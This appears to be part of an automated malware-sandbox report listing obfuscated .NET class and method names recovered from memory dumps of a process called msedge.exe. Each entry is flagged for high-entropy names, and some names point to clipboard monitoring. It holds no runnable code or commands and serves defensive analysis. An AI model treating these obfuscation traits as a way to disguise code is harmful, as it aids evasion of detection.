Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, MsQTzqY2sBj0FbHgvJMxkq82mfk4SRkbM1aSfDlqrPA7a6lhdbMb3mFFZ2ztQ35vqL8QsrgUEv8telYizny7ghy9Nfmg.cs	High entropy of concatenated method names: 'BgWXOWgO0RI3t5W3oSY6ihW9vTBdo1stsBmrzvCZr1Gndmi7B753o71isrC995eT9o2QMOyI9PvSG9rHwAEDKsf8dIVh', 'mLrb28lDc45nuolIayy8ybvyvpu6hLudR8Lzj0L023E83hssFfe4Ma1eNEU7UdPjaWpijvP0kHSy9S65thBPTbeqCUJA', '_09DjBKmArthWJ7592zh4Ps65ujKWx9kewlgrDUdERDPv0YRVmLCPKE64IDx1Ku9e3U0FVLibmymsZ41ZDt9f8mBg2ESA', '_4bGBp8QE8O6JRdrtfU8RPYdGpdB74XBQFj8msmLm3LOx5AvRdiiH6oll9P0BHWylLDtg0fwrvXSjqzRHLQr3fkLXDnLw', 'pzhX0VehHDbIVhtQcfO78TfuwJfdU9GXKyHaZvT26sZpvkz4iUEqJAXiNx6lq92USmuqzNEmovRwUjcVfCg10D1wveTl', 'IIn8M8Ds6cnVUlcv1QgrKruk529mzUiWsXU1TOMMVBP5KAGcmR2e2l9KagPBglolMzhyOzlIKblMEll2IVe5wt33Klux', 'MlxLc2itlvfivBLwxTRK5ByiT33RF6B6hdUZvLb7BSxkuRVtwO0aQikTl07vLaQhcbsNIFTru6AApvXMdCusrd00BaFm', 'j5PRWDxSf9VSbACJNyT4nGG2qWvLnSfB12QggYX0rn7Py0GF86ndV5LzRkt4XuzgnmqzKCAXR3BQtMg2EJA5949r0c7t', '_7RH5Ghmd423QwIyVvETSrMc1o12jYW9ra0VF3ekwSgG6Ot1CEqYbA2o9yAzoOVIknD3fJZqaHVfBMWR9rsKuaHByakzK', 'X3fS1rnQNtUb0WjigIgKDW1OspnbNSJHE03MjnOHx2BJYgzvZFVrX63C5slydfAw6xktldugc6OlQbca6vw3YX9Db0i3'
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, FH0T0lPJxmOipHaUauBOzt38ZrPAkacMeVaEICPqgm67LoA3gyNRBYagqZIL.cs	High entropy of concatenated method names: 'hNeG1c7oW4ipUj5sVSmEsWN55cTDnWsViXhKxYAkTbIS5t2fHkEBnrOdRJkN', 'htgGBQkkZ25Vt7aTvoDA9upspcYaatPrvBn7myCTBjxxdJEIc6cQxQPytM4v', '_28rXdbRVwM8xvJIu2LcOZcIN7mghtOewZ0s8beuoMFcTgPr7rSDe2H7uEMDi', 'JnB4EaOWCVK6CmXmNEkbssXGELYRSKUn68Yb3PXR28GmLF9o3Wbg64ynhFDC', '_96WilbUmS1C4eGEe5JH7B7W3XfAvAiZjNuPdCEjIjqaon9pkGDNrw5vAM37S', 'kaod4hQ3GNleMytR5Y0Ina4LOJU3ZQbpOS2vQPoppNpww3WCpTUewvjJAu5V', 'ddxZ2Rhemy7R2unOOsHOMpK8HzMvGjJ0eEikPrdXcaOZ5oyAxkfoafGFsd6f', 'KfU296howMWcLVz74PfISzC1tx9XuSZbFlPXVrT1iOBkWWCORUqwVwfNKrKccUs0cQoleOKXCIWXC', 'QeDrt88qROMXr706fEE0E1HpRIaJPj7hvIFLjVwYZFvlwOEQHm1vPX3JPJFCqtYiS4OZLIC0RJB5A', 'Ld8Rf0Ydv8y64HCHXnTLgAps4XD4i6O886QLjqWRolpqbSeh4kqkDpYc8tDsxDn4s09A9J2uF1jCZ'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, saLegFlLWIYnHSeWv3dKuvYxlBAXmTHWTTd8nhPEV0s8kgvX0KnK54sY3BzWxnqLHENZgXaI21laB.cs	High entropy of concatenated method names: 'sQSXmDnUDsAfju97T4GHND0Z0uVKgt2Mxqo7t5XH9S4wvY0PHwEzytrAFlLor6bpxNRGPJfjvHQ4K', 'Cpv5Bao84GFnCoXnGp3IjwCjhO1ve6BavihEqBd8Mg8gymfiuXSzAenMo2qtBL1I3tdV5WkLerfjP', '_25kPvP9OArsrcjPYqJfiilFphPvUjCmj4yixA6i6x3WwuPJUJCK0Ftu2TZf6RJf9KJbgTKpXoBgPh', 'LrEmMqWlTNaekZzNbYg', 'drEk8ukSJBhglopOpqN', 'F6jgVhJQSYaP8XzgGdS', 'GqXHztI9xiRouhGm5e1', 'unaqJKXMjH76iEVJpTp', 't9CYMR5x907eh9lbi4A', 'pitcvW4eeXhS3YNNwWP'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.cs	High entropy of concatenated method names: '_9Bn08TCildwgGWw5ui1D1JlHKr9os8w8oiyRTCS75QEGPFy5vOOSEapjlIVJhGz5BKVc4flDBcVvd', 'lFz4ndxuaDtlpPLzecNUzgTpYa8CepDQ5low2qHA07cRu7f3X6Fn9eGrGm2svNSsH1l5nMWdIN5jb', 'cs5yxcWFG5GMivztSJVWFqFiK8zKDWtDZmYqW8o9tq4Bh5p6JTonUXIyyCwwvu3x0Bngn5AZcOVUs', 'utYPojQAhpBfQP2B0Pqcs5fkaIWNwrJw4RTiWES1ECtGG6Y4d7C4XdMeJLRDhKJwB6gqBrPwSS08Z'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, BQfk76GjfWbOZPmrXrjexbuBgHZzzc2HWRV3JskSba2ioac4wluteJ1owZLN.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'tdUcGlOTclDzeVklQUy3QDoZHpgGp3D3cs4WriXkcSEkcgPxiJacMi0Ue0VsXnVzptfRGrwoYA7u5', 'P6BLTPLVpgDpgFiA02p2JkCngv2opgGniph3F2FUG890m8c3tDJsFubAwEB5fCaQWJfDH6p7zlJs2', 'btSJAEQsxcVaLmnVewMgeR6QEjjEOP6yp3vdHTEBaGY3JSoSVANQzN4ebIwfJb4PaMPOrVUSePRrv', 'FN0dHj8mqc6R9DJ2sw4FcVFCsxwX3gPZchRUH5UeCNgsZyoj9oj6UabBGse04kZSroRniqKt16Ggc'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, oki3W4coJSffso6AlSga3ltf5jf2RN6Nzg1npsOU6foKFkshYFENyg8TD1j4VyOJ5kUDBJDhf8T0TJCsZ5mHXmZahCyH.cs	High entropy of concatenated method names: '_4wqgx3rxACvqSTA5TnNFCZ02PTFNEADrSyZcLOFWU9V8p3sFKJ3CnIIFj7g2LZgxdLOyDzlEBH9AH7VGso5fTEgL080f', '_97AW74EnnjelP4PdcT4TH70NjYHSseZLGVKMRACKaUZlzXO0pidIkmboMKZFLIBoFPcsecGLtdf0ugAmWqZC1IFRnYND', '_3xGRxu1RSC26lPmgZf1xU2YD1Sf9hwNOGzBaz91Sd8x4w9KiFC9FDvGhu2LkQ51kvV6zBn0NBC2djcsVL3NhrlH5w0BM', 'eSafZIdZsDiuozAint9nzjfaD0MGjWVC2Pz4aud9EB5vW3cBcjW3KlNAUEtQngFmtujwiZsz0u1KGI6qnzvYaUM7wsJo', 'C3mWZB8wUT1oZ1tSOgF', 'Zx05wMg0LzrEBmHdApu', 'f9UVSBRdtQ3TmmzDXfe', 'q6JxcIobJVuC95ojoKh', 'lhK6vIs1xi2rDf9gkun', 'SlG6dwosjdQHqgo643M'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, x2DOmrf4aoRqGMh2z3QbaZVR6tr9eyzf2AOJ9ZTeCg7qSJkrAjXwddUDGjqXKhMmynIIMO5FArAKUC1xnYWktOfzNH34.cs	High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'e4kesvFTjsLd31DsTZZQHM6eMxdwqF3uNdLmQdc59AghcOvWdkE1VAb9zf2gDilmy1inF1fYCLT6wHCD7XICfGuX8CJ0', 'jJcD6g3ZYSJ8NyoOrmU', 'x2L7hDhLm3oJx9Gv3lF', '_4iucraCc2ilKQQVLJW3', 'B2bp9XS4UvQUERhXUxb'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	High entropy of concatenated method names: '_5BbpTl51Wq9dfGhYnTwOMDKobcARSIOgg7TuRLuXhVGnah64gbIEajDyGpIp', 'Z0douzPzbkLuCx5brDWjtKgQwO2soLzdDpQg3SdvKXZl13SDcY5Ipi1J49w8', 'wAoM6WKp00mJueAI71AFGQ3wqmXEP1pkHB5b09APkIwa0SoeDuJ34CkTOFGQ', 'USt8b06QOt1ruuHADFiuw3w5WoBdzTUUpcO5AbeUoy9MfEr1FkzDRcm5C7Sq', 'A7jDnTxxZGVxJSM6ZVzIuNwT7kNj0ihGLvgPMHPRAt1NeuKD7gm7wDZPbOQg', 'PNT5WaMjY4feO0OxM7kSzb6uxsitzUNHIcPckUl31saejLw0RTeXSKYMUC08', 'NCaYkTTTQJ6httXPbitHIbeXIHkQi9IAA6ATnqWLbN7wdqrep65Sg8hOIvob', 'GzU0vI7e1qQqYVjgl474Qofwqv7jIJEjKfI9FNyHG8VlRYXagvbfYQEtlXdJ', 'xEeWYklEAxw0mi2thoDb2X3e3HLJ4VW5Ix9xJrpokTDMspWyLsKesm8NfegRvEGsnYY8PdfIZZWaYRoRMGlLyj686szu', 'Yz4zxI0GKfm2q0fiDsI92HeeRzFyyDOVHAGxKwYceqxs9nOYwpmJZMen9OZhNKaBiYyhzfSP0nCPQmSiRdEEmP6pFAPY'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, suAjnEJ1tn19sYA8ph0zWO4KI0IAS710e8IdvKQBnFouqwg41s12GOWadMmSoJWXgtPaLiwpYIUTm4RFU37TxMqWnbEW.cs	High entropy of concatenated method names: 'Es9h9uO628y5YKaAkQ7dnwRD30b3fxdzWedVfJCQYelDgDPkdvAjkPOyOqLTB3zYAs22uIUPOGSpXdzy1LJbOPn3pIyw', 'EEJmlnQQEokLnsYFc42', 'MZ1feRe9efQapqQVeeO', 'TZHGqLs9qB9WDqbGRmo', 'TghhsLbD2I8taVjfnXo'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, j4OBjGzsTyn926v13gfaBqAy3UG1OcemEb48CW43hFDL9Rhvuocla1V6yigq1u3yB2KPI83Dfnqe3F3Bjdz6jgdC3Cla.cs	High entropy of concatenated method names: 'Bc6jlvdLiV0eGEtQqUdB7tFmFG7MFYO0nqun0EbTqW3s9xIoMdyz1EELwRR2i0UeEktbcthSIcysLppLTCzTjD9NAusn', '_2LW9I7pYZ3b9EeFJhk327yLmRk5EeoCLfVONfhQkhnxfAC70YWEE8W2WDrB8nHUY2sEvjYgcBjz9DzkFINciGeRvHG3C', 'NwePAVtdHy11RKBkDvm', 'xbGWj78kFh9iVsGKXf1', 'njqZOXLiYN76Wwj0xvE', '_0PguuGyBRNJpE5Pw5SZ'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, qKLYzluXZRa87qfgby7f1QvAiFApv6boeJXNLh3dGcNiFrkr4odQCsRBCEEIzobklTYyOdliM2CpBiTVVhDVmcqtzJen.cs	High entropy of concatenated method names: '_1VTjDOLdCSMBa2movci95KiSGFSWpLfgnCxb822LlYdca0tRdXmSDMOfnnZ2aiOXLpLBqXHuPEaEjaiHANSrHYJg27am', 'Bm1rIHUShRqE8opCQLf', 'YSV46VLzzcCRjLwgvDZ', 'xyDSkenR4LTnO8VU9gZ', 'vdp4TAUeD1fktVjqvb2'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	High entropy of concatenated method names: '_13q2RwWL6kIdDpZIw5GHl1rQ3LGDf5pk2w4gX5i7a8YN1hzibxZrCrKncOQ4YJorJehilf00i1Uk3', '_1SlNo9r4dH6Xh2hpGrXad1Z7hVyq189HFbq17zwr6n4UrLJzOlIdS8MD9zd3jbVdCBMipX079gPrS', 'DfX3d8XCHeJXBfgwY9DYLb9MJV3sFfrk2Kb7YDsPYNHs3DpkyJMJRtdcmLCOSYQ0yOC9QfvtU5VIx', 'K8K9Uptmcx8N9bKMIudouOFVobs2MiRk3CpDRl0y8bJDvI7zPo2yyE7HblZiQPusApo3lm36KXLMm', '_2fnOX2a9wuPs69oCra5CqyxdF7pQa8WpnNWLpzxiXc1WrlMYdALUsCtgOKa9PsYWsW5Sq2yiDZkGw', 'YMrKRrkfsOT3HBzZWk07KMj14bj6JgDIsk9ymPQ59VViEQAYWsbVJX1tNvbuhKD1oDNealXlAhy1R', 'pYabpkxx09uAXCbSpMvQeovZUw2WDpPNQ92fWuR56kjJvxOAXfznd7S2ismB1s08n4AEy80tr8pYD', 'JAQQxburJhsr6ChC3StZT1JaDnllduJSJBYE073tMrS5IkQG0nGbqDAngBGiOM68J1m5eESWsAU3I', 'I1obCKB8xP1KjlKpQGdiUeGrHS3vEjY8kvwm2oM6Z3b0xNcGoWRvNesiOn2OAqM31glYTMfPXGKOl', 'QXb3jbSbeRJuBdhDWEt7BiFtO5p735MH7Ke30INhXB0F6JiDgFDLe2vKSYrJfJDy0ecVWkcDpXoyN'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	High entropy of concatenated method names: 'uzfZnNOIdl9ASznhBti6dboQGUqma4csnyt40Om4rHnaR8gBon8wo1R97NHd', 'SsGBh0oAZnPm54HCCLaOkCG4Lrbv74Wo5brscPTBJiQGm96MvIeF8WqunDFa', '_3XyJJJLx3AzBJXgjVLQCy8xcM42rXrJQNq4yyM3rNuh1SeizqwQ8gz9KTrz4', '_9PbgE1vnF2SIsxtso3JzCVhNXapaJAmRvSUj7jErjg4OrGnRQokKpvRveyfr', '_9zo2bjiCfoX22dVwaPQEfQGB5LtI5A1FiJZc8GIuGpX8mDJVmxNIuIcchikq', 'AC6POjmTSJSTzUzSaTPKLP0fQ9X8duqqecIyrV9ooXrHb7GmFR5leKnobNVL', 'ApnmwzOllDhlx7gWCX17rmuKPH77lZvf25oO44AWM0h30Yu7WdJiWbOxnhr4', 'CgzgAOIPBlBeXNNtnCxcBVeHJ0NnaC2t3PCwN9OpjWMxIkW15yrgd1L0K7T5', 'DVKx1JP01mCQmbiVDFdgndGq0yXkDTC9uuhxUsDFPs7n9xfeZvWJdFUPAX3t', 'NexAheQlgE8KiUjgQpt8YGIkhuK151Na2bjE654nWvetAbi5y2m29X5qiE1v'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, MsQTzqY2sBj0FbHgvJMxkq82mfk4SRkbM1aSfDlqrPA7a6lhdbMb3mFFZ2ztQ35vqL8QsrgUEv8telYizny7ghy9Nfmg.cs	High entropy of concatenated method names: 'BgWXOWgO0RI3t5W3oSY6ihW9vTBdo1stsBmrzvCZr1Gndmi7B753o71isrC995eT9o2QMOyI9PvSG9rHwAEDKsf8dIVh', 'mLrb28lDc45nuolIayy8ybvyvpu6hLudR8Lzj0L023E83hssFfe4Ma1eNEU7UdPjaWpijvP0kHSy9S65thBPTbeqCUJA', '_09DjBKmArthWJ7592zh4Ps65ujKWx9kewlgrDUdERDPv0YRVmLCPKE64IDx1Ku9e3U0FVLibmymsZ41ZDt9f8mBg2ESA', '_4bGBp8QE8O6JRdrtfU8RPYdGpdB74XBQFj8msmLm3LOx5AvRdiiH6oll9P0BHWylLDtg0fwrvXSjqzRHLQr3fkLXDnLw', 'pzhX0VehHDbIVhtQcfO78TfuwJfdU9GXKyHaZvT26sZpvkz4iUEqJAXiNx6lq92USmuqzNEmovRwUjcVfCg10D1wveTl', 'IIn8M8Ds6cnVUlcv1QgrKruk529mzUiWsXU1TOMMVBP5KAGcmR2e2l9KagPBglolMzhyOzlIKblMEll2IVe5wt33Klux', 'MlxLc2itlvfivBLwxTRK5ByiT33RF6B6hdUZvLb7BSxkuRVtwO0aQikTl07vLaQhcbsNIFTru6AApvXMdCusrd00BaFm', 'j5PRWDxSf9VSbACJNyT4nGG2qWvLnSfB12QggYX0rn7Py0GF86ndV5LzRkt4XuzgnmqzKCAXR3BQtMg2EJA5949r0c7t', '_7RH5Ghmd423QwIyVvETSrMc1o12jYW9ra0VF3ekwSgG6Ot1CEqYbA2o9yAzoOVIknD3fJZqaHVfBMWR9rsKuaHByakzK', 'X3fS1rnQNtUb0WjigIgKDW1OspnbNSJHE03MjnOHx2BJYgzvZFVrX63C5slydfAw6xktldugc6OlQbca6vw3YX9Db0i3'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, FH0T0lPJxmOipHaUauBOzt38ZrPAkacMeVaEICPqgm67LoA3gyNRBYagqZIL.cs	High entropy of concatenated method names: 'hNeG1c7oW4ipUj5sVSmEsWN55cTDnWsViXhKxYAkTbIS5t2fHkEBnrOdRJkN', 'htgGBQkkZ25Vt7aTvoDA9upspcYaatPrvBn7myCTBjxxdJEIc6cQxQPytM4v', '_28rXdbRVwM8xvJIu2LcOZcIN7mghtOewZ0s8beuoMFcTgPr7rSDe2H7uEMDi', 'JnB4EaOWCVK6CmXmNEkbssXGELYRSKUn68Yb3PXR28GmLF9o3Wbg64ynhFDC', '_96WilbUmS1C4eGEe5JH7B7W3XfAvAiZjNuPdCEjIjqaon9pkGDNrw5vAM37S', 'kaod4hQ3GNleMytR5Y0Ina4LOJU3ZQbpOS2vQPoppNpww3WCpTUewvjJAu5V', 'ddxZ2Rhemy7R2unOOsHOMpK8HzMvGjJ0eEikPrdXcaOZ5oyAxkfoafGFsd6f', 'KfU296howMWcLVz74PfISzC1tx9XuSZbFlPXVrT1iOBkWWCORUqwVwfNKrKccUs0cQoleOKXCIWXC', 'QeDrt88qROMXr706fEE0E1HpRIaJPj7hvIFLjVwYZFvlwOEQHm1vPX3JPJFCqtYiS4OZLIC0RJB5A', 'Ld8Rf0Ydv8y64HCHXnTLgAps4XD4i6O886QLjqWRolpqbSeh4kqkDpYc8tDsxDn4s09A9J2uF1jCZ'
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, saLegFlLWIYnHSeWv3dKuvYxlBAXmTHWTTd8nhPEV0s8kgvX0KnK54sY3BzWxnqLHENZgXaI21laB.cs	High entropy of concatenated method names: 'sQSXmDnUDsAfju97T4GHND0Z0uVKgt2Mxqo7t5XH9S4wvY0PHwEzytrAFlLor6bpxNRGPJfjvHQ4K', 'Cpv5Bao84GFnCoXnGp3IjwCjhO1ve6BavihEqBd8Mg8gymfiuXSzAenMo2qtBL1I3tdV5WkLerfjP', '_25kPvP9OArsrcjPYqJfiilFphPvUjCmj4yixA6i6x3WwuPJUJCK0Ftu2TZf6RJf9KJbgTKpXoBgPh', 'LrEmMqWlTNaekZzNbYg', 'drEk8ukSJBhglopOpqN', 'F6jgVhJQSYaP8XzgGdS', 'GqXHztI9xiRouhGm5e1', 'unaqJKXMjH76iEVJpTp', 't9CYMR5x907eh9lbi4A', 'pitcvW4eeXhS3YNNwWP'
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.cs	High entropy of concatenated method names: '_9Bn08TCildwgGWw5ui1D1JlHKr9os8w8oiyRTCS75QEGPFy5vOOSEapjlIVJhGz5BKVc4flDBcVvd', 'lFz4ndxuaDtlpPLzecNUzgTpYa8CepDQ5low2qHA07cRu7f3X6Fn9eGrGm2svNSsH1l5nMWdIN5jb', 'cs5yxcWFG5GMivztSJVWFqFiK8zKDWtDZmYqW8o9tq4Bh5p6JTonUXIyyCwwvu3x0Bngn5AZcOVUs', 'utYPojQAhpBfQP2B0Pqcs5fkaIWNwrJw4RTiWES1ECtGG6Y4d7C4XdMeJLRDhKJwB6gqBrPwSS08Z'
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, BQfk76GjfWbOZPmrXrjexbuBgHZzzc2HWRV3JskSba2ioac4wluteJ1owZLN.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'tdUcGlOTclDzeVklQUy3QDoZHpgGp3D3cs4WriXkcSEkcgPxiJacMi0Ue0VsXnVzptfRGrwoYA7u5', 'P6BLTPLVpgDpgFiA02p2JkCngv2opgGniph3F2FUG890m8c3tDJsFubAwEB5fCaQWJfDH6p7zlJs2', 'btSJAEQsxcVaLmnVewMgeR6QEjjEOP6yp3vdHTEBaGY3JSoSVANQzN4ebIwfJb4PaMPOrVUSePRrv', 'FN0dHj8mqc6R9DJ2sw4FcVFCsxwX3gPZchRUH5UeCNgsZyoj9oj6UabBGse04kZSroRniqKt16Ggc'
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, oki3W4coJSffso6AlSga3ltf5jf2RN6Nzg1npsOU6foKFkshYFENyg8TD1j4VyOJ5kUDBJDhf8T0TJCsZ5mHXmZahCyH.cs	High entropy of concatenated method names: '_4wqgx3rxACvqSTA5TnNFCZ02PTFNEADrSyZcLOFWU9V8p3sFKJ3CnIIFj7g2LZgxdLOyDzlEBH9AH7VGso5fTEgL080f', '_97AW74EnnjelP4PdcT4TH70NjYHSseZLGVKMRACKaUZlzXO0pidIkmboMKZFLIBoFPcsecGLtdf0ugAmWqZC1IFRnYND', '_3xGRxu1RSC26lPmgZf1xU2YD1Sf9hwNOGzBaz91Sd8x4w9KiFC9FDvGhu2LkQ51kvV6zBn0NBC2djcsVL3NhrlH5w0BM', 'eSafZIdZsDiuozAint9nzjfaD0MGjWVC2Pz4aud9EB5vW3cBcjW3KlNAUEtQngFmtujwiZsz0u1KGI6qnzvYaUM7wsJo', 'C3mWZB8wUT1oZ1tSOgF', 'Zx05wMg0LzrEBmHdApu', 'f9UVSBRdtQ3TmmzDXfe', 'q6JxcIobJVuC95ojoKh', 'lhK6vIs1xi2rDf9gkun', 'SlG6dwosjdQHqgo643M'
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, x2DOmrf4aoRqGMh2z3QbaZVR6tr9eyzf2AOJ9ZTeCg7qSJkrAjXwddUDGjqXKhMmynIIMO5FArAKUC1xnYWktOfzNH34.cs	High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'e4kesvFTjsLd31DsTZZQHM6eMxdwqF3uNdLmQdc59AghcOvWdkE1VAb9zf2gDilmy1inF1fYCLT6wHCD7XICfGuX8CJ0', 'jJcD6g3ZYSJ8NyoOrmU', 'x2L7hDhLm3oJx9Gv3lF', '_4iucraCc2ilKQQVLJW3', 'B2bp9XS4UvQUERhXUxb'
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	High entropy of concatenated method names: '_5BbpTl51Wq9dfGhYnTwOMDKobcARSIOgg7TuRLuXhVGnah64gbIEajDyGpIp', 'Z0douzPzbkLuCx5brDWjtKgQwO2soLzdDpQg3SdvKXZl13SDcY5Ipi1J49w8', 'wAoM6WKp00mJueAI71AFGQ3wqmXEP1pkHB5b09APkIwa0SoeDuJ34CkTOFGQ', 'USt8b06QOt1ruuHADFiuw3w5WoBdzTUUpcO5AbeUoy9MfEr1FkzDRcm5C7Sq', 'A7jDnTxxZGVxJSM6ZVzIuNwT7kNj0ihGLvgPMHPRAt1NeuKD7gm7wDZPbOQg', 'PNT5WaMjY4feO0OxM7kSzb6uxsitzUNHIcPckUl31saejLw0RTeXSKYMUC08', 'NCaYkTTTQJ6httXPbitHIbeXIHkQi9IAA6ATnqWLbN7wdqrep65Sg8hOIvob', 'GzU0vI7e1qQqYVjgl474Qofwqv7jIJEjKfI9FNyHG8VlRYXagvbfYQEtlXdJ', 'xEeWYklEAxw0mi2thoDb2X3e3HLJ4VW5Ix9xJrpokTDMspWyLsKesm8NfegRvEGsnYY8PdfIZZWaYRoRMGlLyj686szu', 'Yz4zxI0GKfm2q0fiDsI92HeeRzFyyDOVHAGxKwYceqxs9nOYwpmJZMen9OZhNKaBiYyhzfSP0nCPQmSiRdEEmP6pFAPY'
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, suAjnEJ1tn19sYA8ph0zWO4KI0IAS710e8IdvKQBnFouqwg41s12GOWadMmSoJWXgtPaLiwpYIUTm4RFU37TxMqWnbEW.cs	High entropy of concatenated method names: 'Es9h9uO628y5YKaAkQ7dnwRD30b3fxdzWedVfJCQYelDgDPkdvAjkPOyOqLTB3zYAs22uIUPOGSpXdzy1LJbOPn3pIyw', 'EEJmlnQQEokLnsYFc42', 'MZ1feRe9efQapqQVeeO', 'TZHGqLs9qB9WDqbGRmo', 'TghhsLbD2I8taVjfnXo'
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, j4OBjGzsTyn926v13gfaBqAy3UG1OcemEb48CW43hFDL9Rhvuocla1V6yigq1u3yB2KPI83Dfnqe3F3Bjdz6jgdC3Cla.cs	High entropy of concatenated method names: 'Bc6jlvdLiV0eGEtQqUdB7tFmFG7MFYO0nqun0EbTqW3s9xIoMdyz1EELwRR2i0UeEktbcthSIcysLppLTCzTjD9NAusn', '_2LW9I7pYZ3b9EeFJhk327yLmRk5EeoCLfVONfhQkhnxfAC70YWEE8W2WDrB8nHUY2sEvjYgcBjz9DzkFINciGeRvHG3C', 'NwePAVtdHy11RKBkDvm', 'xbGWj78kFh9iVsGKXf1', 'njqZOXLiYN76Wwj0xvE', '_0PguuGyBRNJpE5Pw5SZ'
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, qKLYzluXZRa87qfgby7f1QvAiFApv6boeJXNLh3dGcNiFrkr4odQCsRBCEEIzobklTYyOdliM2CpBiTVVhDVmcqtzJen.cs	High entropy of concatenated method names: '_1VTjDOLdCSMBa2movci95KiSGFSWpLfgnCxb822LlYdca0tRdXmSDMOfnnZ2aiOXLpLBqXHuPEaEjaiHANSrHYJg27am', 'Bm1rIHUShRqE8opCQLf', 'YSV46VLzzcCRjLwgvDZ', 'xyDSkenR4LTnO8VU9gZ', 'vdp4TAUeD1fktVjqvb2'
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	High entropy of concatenated method names: '_13q2RwWL6kIdDpZIw5GHl1rQ3LGDf5pk2w4gX5i7a8YN1hzibxZrCrKncOQ4YJorJehilf00i1Uk3', '_1SlNo9r4dH6Xh2hpGrXad1Z7hVyq189HFbq17zwr6n4UrLJzOlIdS8MD9zd3jbVdCBMipX079gPrS', 'DfX3d8XCHeJXBfgwY9DYLb9MJV3sFfrk2Kb7YDsPYNHs3DpkyJMJRtdcmLCOSYQ0yOC9QfvtU5VIx', 'K8K9Uptmcx8N9bKMIudouOFVobs2MiRk3CpDRl0y8bJDvI7zPo2yyE7HblZiQPusApo3lm36KXLMm', '_2fnOX2a9wuPs69oCra5CqyxdF7pQa8WpnNWLpzxiXc1WrlMYdALUsCtgOKa9PsYWsW5Sq2yiDZkGw', 'YMrKRrkfsOT3HBzZWk07KMj14bj6JgDIsk9ymPQ59VViEQAYWsbVJX1tNvbuhKD1oDNealXlAhy1R', 'pYabpkxx09uAXCbSpMvQeovZUw2WDpPNQ92fWuR56kjJvxOAXfznd7S2ismB1s08n4AEy80tr8pYD', 'JAQQxburJhsr6ChC3StZT1JaDnllduJSJBYE073tMrS5IkQG0nGbqDAngBGiOM68J1m5eESWsAU3I', 'I1obCKB8xP1KjlKpQGdiUeGrHS3vEjY8kvwm2oM6Z3b0xNcGoWRvNesiOn2OAqM31glYTMfPXGKOl', 'QXb3jbSbeRJuBdhDWEt7BiFtO5p735MH7Ke30INhXB0F6JiDgFDLe2vKSYrJfJDy0ecVWkcDpXoyN'
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	High entropy of concatenated method names: 'uzfZnNOIdl9ASznhBti6dboQGUqma4csnyt40Om4rHnaR8gBon8wo1R97NHd', 'SsGBh0oAZnPm54HCCLaOkCG4Lrbv74Wo5brscPTBJiQGm96MvIeF8WqunDFa', '_3XyJJJLx3AzBJXgjVLQCy8xcM42rXrJQNq4yyM3rNuh1SeizqwQ8gz9KTrz4', '_9PbgE1vnF2SIsxtso3JzCVhNXapaJAmRvSUj7jErjg4OrGnRQokKpvRveyfr', '_9zo2bjiCfoX22dVwaPQEfQGB5LtI5A1FiJZc8GIuGpX8mDJVmxNIuIcchikq', 'AC6POjmTSJSTzUzSaTPKLP0fQ9X8duqqecIyrV9ooXrHb7GmFR5leKnobNVL', 'ApnmwzOllDhlx7gWCX17rmuKPH77lZvf25oO44AWM0h30Yu7WdJiWbOxnhr4', 'CgzgAOIPBlBeXNNtnCxcBVeHJ0NnaC2t3PCwN9OpjWMxIkW15yrgd1L0K7T5', 'DVKx1JP01mCQmbiVDFdgndGq0yXkDTC9uuhxUsDFPs7n9xfeZvWJdFUPAX3t', 'NexAheQlgE8KiUjgQpt8YGIkhuK151Na2bjE654nWvetAbi5y2m29X5qiE1v'
